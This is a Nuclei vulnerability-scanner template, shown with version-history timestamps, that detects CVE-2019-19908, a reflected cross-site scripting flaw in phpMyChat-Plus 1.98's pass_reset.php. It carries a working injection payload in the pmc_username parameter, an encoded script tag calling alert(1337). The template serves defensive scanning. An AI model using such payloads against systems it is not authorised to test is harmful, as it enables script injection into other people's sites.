nuclei-templates/cves/2019/CVE-2019-19908.yaml

35 lines
1021 B
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-19908
2020-04-08 13:04:46 +00:00
info:
name: phpMyChat-Plus 1.98 - Cross-Site Scripting
2020-04-08 13:04:46 +00:00
author: madrobot
2020-05-25 07:49:06 +00:00
severity: medium
description: phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
reference:
- https://cinzinga.github.io/CVE-2019-19908/
- http://ciprianmp.com/
- https://sourceforge.net/projects/phpmychat/
- https://nvd.nist.gov/vuln/detail/CVE-2019-19908
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-19908
cwe-id: CWE-79
tags: cve,cve2019,xss,injection,javascript
2020-04-08 13:04:46 +00:00
requests:
- method: GET
path:
2020-04-09 20:21:15 +00:00
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
matchers-condition: and
2020-04-08 13:04:46 +00:00
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
2020-04-08 13:20:50 +00:00
- type: word
2020-04-08 13:24:57 +00:00
words:
2020-05-25 07:49:06 +00:00
- "<script>alert(1337)</script>"
2020-04-08 13:04:46 +00:00
part: body
# Enhanced by mp on 2022/08/31